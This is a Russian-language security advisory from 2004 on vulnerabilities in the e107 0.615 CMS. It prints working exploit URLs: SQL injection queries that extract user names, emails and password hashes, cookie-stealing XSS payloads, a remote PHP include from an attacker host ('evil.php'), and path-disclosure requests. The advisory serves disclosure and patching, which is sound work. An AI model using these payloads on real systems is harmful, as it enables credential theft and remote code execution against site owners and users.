Security Lab

Множественные уязвимости в e107

Дата публикации:31.05.2004
Дата изменения:17.10.2006
Всего просмотров:22135
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: e107 0.615

Описание: Несколько уязвимостей обнаружена в e107. Удаленный пользователь может выполнить SQL команды и выполнить XSS нападение. В некоторых случаях, удаленный пользователь может выполнить произвольный PGP код на целевой системе. Также удаленный пользователь может раскрыть инсталляционный путь.

1. SQl инъекция:

http://localhost/e107_0615/content.php?content.99/* */UNION/**/SELECT/**/null,null,null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,
null,null,null/**/FROM/**/e107_user/**/ WHERE/**/user_id=1/*

http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null,null,null,null,null,
null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/nul l,null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,
null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
2. XSS:
http://localhost/e107_0615/e107_plugins/clock_menu/clock _menu.php?clock_flat=1&LAN_407=foo%22);
//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]
Поле "logged name" в "email article to a friend" и "submit news" также уязвимо к XSS.

3. PHP include:

 http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://[attacker]/evil.php
4. Раскрытие пути:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugin s/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php

http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php 

URL производителя:http://www.e107.org/

Решение:Некоторые уязвимости устранены в 0.616.

Ссылки: [waraxe-2004-SA#031 - Multiple vulnerabilities in e107 version 0.615]